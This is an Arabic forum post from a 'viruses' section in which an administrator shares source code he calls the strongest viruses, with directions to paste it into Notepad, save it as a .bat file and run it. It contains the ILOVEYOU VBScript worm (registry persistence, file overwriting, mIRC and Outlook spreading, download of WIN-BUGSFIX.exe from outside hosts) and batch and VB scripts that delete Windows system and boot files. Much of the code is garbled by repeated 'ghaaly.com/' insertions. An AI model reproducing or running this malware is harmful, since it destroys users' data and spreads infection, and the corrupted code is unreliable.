باب الغول
سلام الله
اخي الزائر هذه الرسالة تفيد انك غير مسجل
لو تكرمنا بالتسجيل وتكون واحد من
اسرة باب الغول
فضلا وليس امرا

باب الغول

منتديات باب الغول التعليمية في خدمتكم
 
الرئيسيةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 اقوى الفيروسات على الاطلاق

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
ziko inrhaoun
المدير
المدير
avatar

عدد المساهمات : 282
نقاط : 7189
السٌّمعَة : 3
تاريخ التسجيل : 09/11/2011
العمر : 28
الموقع : bablghol.mountada.net

مُساهمةموضوع: اقوى الفيروسات على الاطلاق   الجمعة 9 ديسمبر - 14:34

<blockquote class="postcontent restore ">
بسم الله الرحمن الرحيم


اعزائى اعضاء وزوار موقع اليوم اقدم لكم مجموعة متنوعة من اكواد الفيروسات
الشهيرة , وننصح بعدم استخدم هذه الفيروسات على نفسك وعندما تريد استخدمها
يجب ان يكون لديك برنامج AntiVirus .

كيفية تشغيل هذه الاكواد وعمل فيروسات منها ؟
- كل ماعليك هو ان تاخذ الكود من هنا , وتضعه فى الـ Notepad وتحفظه بامتداد Bat واحزر الضغط عليه .

الاكــــــــــــواد

كود فيروس الحب Love

كود:

rem barok -loveletter(vbe) <i hate go to school>
rem by: EVIL-MASTER / evil5000x@hotmail.com/ Group /EVIL-ATTACK Manila,Philippines

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d


ow
eq=""
ctr=0
Set fso = CreateObject("ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing.FileSystemObject")
set file = fso.OpenTextFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Fullname,1)
vbscopy=file.ReadAll

REM main() ' CSS: Main has been REMed out to provide more innoculation. unREM to run.

sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\ghaaly.c om/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout",0,"REG_DWORD"
end if

Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/FullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()
html()
REM spreadtoemail() ' CSS: Causes the worm to propogate itself. REMed for even more innoculation.
listadriv()
end sub

sub regruns()
On Error Resume Next
Dim num,downread
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr


entVersion\Run\MSKernel32",dirsystem&"\MSKernel32. vbs"
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr


entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL .vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:"
end if

if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf


7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j


nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V


bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras


djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy


7thjg/WIN-BUGSFIX.exe"
end if
end if

if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr


entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about :blank"
end if
end sub

sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub

Sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files

for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.Getghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Name(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if

if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ini") or (s="mirc.hlp") then
set ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini=fso.CreateTextFile(folderspec&"\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.i ni")
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "[ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/]"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";mIRC ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "; Please dont edit this ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/... mIRC will corrupt, if mIRC will"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine " corrupt... ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ will affect and will not run correctly. thanks"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";Khaled Mardam-Bey"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";http://www.mirc.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n0=on 1:JOIN:#:{"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n1= /if ( $nick == $me ) { halt }"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n3=}"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.close
eq=folderspec
end if
end if
next
end sub

sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders

for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next

end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regedit.RegWrite regkey,regvalue
end sub

function regget(value)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regget=regedit.RegRead(value)
end function

function fileexist(filespec)

On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if

fileexist = msg
end function

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function



sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega


d
set regedit=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
set out=Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB"&a)
if (regv="") then
regv=1
end if

if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&ma lead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a, a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a, a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub


كود فيروس لتدمير


كود:

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\msconfig.exe

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll32.exe

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\regedit.exe

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll.exe

Del c:\Autoexec.bat

Del c:\command.com

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logos.sys

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logow.sys

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Scanregw.exe

Del C:\Program Files\Internet Explorer\Iexplore.exe

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\Sysedit.exe

Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.com



@Echo off

c:

cd %WinDir%\System\

deltree /y *.exe


كود فيروس الـ Visual Basic


كود:

SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe"

كود فيروس الـ HTML


كود:

Active-X HTML

THIS HTML USING ACTIVE-X PLEASE CLICK #YES#


ملاحضة بعد وضع الكود في bloc note عليك تسجيله بالمتداد Bat




المرجو عدم استعمالها على المسلمين
</blockquote>
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://bablghol.c.la
 
اقوى الفيروسات على الاطلاق
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
باب الغول :: قسم الفيروسات :: فيروسات الاجهزة-
انتقل الى: